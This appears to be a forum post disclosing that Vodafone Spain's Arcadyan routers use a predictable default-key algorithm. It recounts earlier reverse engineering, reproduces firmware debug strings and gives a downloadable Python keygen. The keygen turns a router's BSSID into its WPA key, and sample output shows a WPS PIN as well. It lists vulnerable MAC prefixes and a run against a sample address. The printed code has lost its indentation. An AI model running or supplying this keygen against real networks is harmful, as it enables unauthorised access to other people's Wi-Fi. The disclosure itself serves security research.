Autor
Código:
git clone https://bitbucket.org/dudux/vodafonearcadyanspain.git
Más detalle en :
http://ednolo.alumnos.upv.es/?p=1760
Código:
Background
Around 2011 some routers manufactured by the company Arcadyan were reverse engineered for the staff of seguridadwireless.net. Such research came out for an user called MrFoffly or something like that. This guy obtained an interesting log from an update of Ya.com, he used an firmware image and applied xor FF in raw mode obtaining the following logs. Many routers could be affected for the same vulnerability in the future if this company keeps using same public and patented algorithms.
[code]##!![E-BOOTPARAM-WRITE] User settings are not stored!!
###[BUILD-WEP] (Z1 Z2 Z3): %1X%1X%1X
##[BUILD-WEP] (x[1] XOR z[2])=(%1X XOR %1X)=%1X
##[BUILD-WEP] (y[2] XOR y[3]) =(%1X XOR %1X)=%1X
#[BUILD-WEP] (x[3] XOR y[1]) =(%1X XOR %1X)=%1X
####[BUILD-WEP] (x[2] XOR z[3]) =(%1X XOR %1X)=%1X
####[BUILD-WEP] (w[0] w[1] w[2] w[3]): %1X%1X%1X%1X
####%1X%1X%1X%1X%1X%1X%1X%1X%1X%1X%1X%1X%1X#[BUILD-WEP]: Key:%s
####[BUILD-WEP] K1,2:[%1X,%1X]
#[BUILD-WEP] (K1 XOR S10)=(%1X XOR %1X)=%1X
#[BUILD-WEP] (K1 XOR S9) =(%1X XOR %1X)=%1X
#[BUILD-WEP] (K1 XOR S8) =(%1X XOR %1X)=%1X
#[BUILD-WEP] (X1 X2 X3): %1X%1X%1X
##[BUILD-WEP] (K2 XOR M10)=(%1X XOR %1X)=%1X
#[BUILD-WEP] (K2 XOR M11)=(%1X XOR %1X)=%1X
#[BUILD-WEP] (K2 XOR M12)=(%1X XOR %1X)=%1X
#[BUILD-WEP] (Y1 Y2 Y3): %1X%1X%1X
##[BUILD-WEP] (M11 XOR S10)=(%1X XOR %1X)=%1X
####Boot Parameters NOT found !!!
##Bootcode version: %s
###Serial number: %s
##Hardware version: %s
###%02X%02X%02X%02X%02X%02X####strWlanMacAddr:%s
##WLAN%c%c%c%c%c%c####[BUILD-WEP] S6,7,8,9,10:[%1X,%1X,%1X,%1X,%1X]
##[BUILD-WEP] M7,8,9,10,11,12:[%1X,%1X,%1X,%1X,%1X,%1X]
##!!! Invalid wireless channel range %d ~ %d
#!!! Use default value %d ~ %d
##default route: %d.%d.%d.%d
#ifno:%d enableOS:%d enableWEP:%d enableSSN:%d
#!!No configuration file present!!
##!!Cleanup configuration in flash memory!!
##%s> flash version:[%s], [%d.%d.%d]
#etcpip_init_config##Jan 18 2008#16:39:45####Set flash memory layout to #BRN-BOOT####Boot Parameters found !!!
##01234567####[BUILD-WEP] (M12 XOR S9) =(%1X XOR %1X)=%1X
####[BUILD-WEP] (K1 XOR K2) =(%1X XOR %1X)=%1X
####!![E-CFG-VER] Reconfiguration required!!
After that, some of us were a bit stuck but another user, Mambostar, achieved to figure out the algorithm in order to generate 10 possible keys by using the logs as well as the patents [Look at references] . Two years later, some German researchers reverse engineered some Easybox routers finding the same problems. Either using this algorithm or patents as well, many routers were exposed around all Germany. One year later more or less 2013-2014, and unfortunately, this algorithm has come back to hit some Spanish routers deployed by Vodafone, actually this model ARV752DPW. However really not many of Vodafone’s routers have been affected for this vulnerability.
Proof-of-concept
Here you go a proof-of-concept of this vulnerability what I coded due to a small difference in the algorithm. Plenty of code has been reused for previous scripts, please take a look at credits in the code. So far the unique difference appreciated has been the swapping between zeros by ones at the end of the key generation’s algorithm and other stuff very weird like the use of non-hexadecimal characters in the ESSID. If any zero is detected at fifth or sixth byte of the BSSID is automatically transformed into G for the ESSID.
Código:
def algorithm(mac):
'''Sebastian Petters. Changes: Added exceptions and leave out some variables pointless'''
try:
bytes = [int(x, 16) for x in mac.split(':')]
c1 = (bytes[-2] << 8) + bytes[-1]
(s6, s7, s8, s9, s10) = [int(x) for x in '%05d' % (c1)]
(m9, m10, m11, m12) = [int(x, 16) for x in mac.replace(':', '')[8:]]
except:
sys.stderr.write("[!] Check your bssid! Format XX:XX:XX:XX:XX:XX\n")
sys.exit()
k1 = ( s7 + s8 + m11 + m12) & (0x0F)
k2 = ( m9 + m10 + s9 + s10) & (0x0F)
x1 = k1 ^ s10
x2 = k1 ^ s9
x3 = k1 ^ s8
y1 = k2 ^ m10
y2 = k2 ^ m11
y3 = k2 ^ m12
z1 = m11 ^ s10
z2 = m12 ^ s9
z3 = k1 ^ k2
wpa = "%X%X%X%X%X%X%X%X%X" % (x1, y1, z1, x2, y2, z2, x3, y3, z3)
# Spanish modification in this algorithm
if wpa.find("0") != -1:
wpa = wpa.replace("0","1")
return wpa
Código:
$ python vodafoneArcadyanSpain.py -h
usage: vodafoneArcadyanSpain.py [-h] [-b [BSSID]] [-v] [-l]
>>> PoC keygen for WiFi Networks deployed by Vodafone Arcadyan in Spain. So
far only WiFi networks with well-known bssids and essid like VodafoneXXXX are
likely vulnerable. See http://ednolo.alumnos.upv.es/ for more details.
Twitter: @enovella_ and email: ednolo[at]inf.upv.es
optional arguments:
-h, --help show this help message and exit
-v, --version show program's version number and exit
-l, --list List all vulnerable mac address (essid VodafoneXXXX)
required:
-b [BSSID], --bssid [BSSID]
Target mac address
(+) Help: Send me bugs or new targets. Credits buckynet as usual
$ python vodafoneArcadyanSpain.py -l
[+] Possible vulnerable targets:
bssid: 74:31:70:xx:xx:xx essid: VodafoneXXXX
bssid: 84:9C:A6:xx:xx:xx essid: VodafoneXXXX
bssid: 88:03:55:xx:xx:xx essid: VodafoneXXXX
bssid: 1C:C6:3C:xx:xx:xx essid: VodafoneXXXX
bssid: 50:7E:5D:xx:xx:xx essid: VodafoneXXXX
bssid: 00:12:BF:xx:xx:xx essid: VodafoneXXXX
$ python vodafoneArcadyanSpain.py -b 74:31:70:33:00:11
[+] SSID : VodafoneGG11
[+] BSSID : 74:31:70:33:00:11
[+] WPA KEY : 58639129A
[+] WPS PIN : 75944988
Que alegría ver a *dudux
https://foro.elhacker.net/hacking_wireless/cuidado_con_los_que_tengais_un_router_vodafone-t406822.0.html
[/code]
En línea
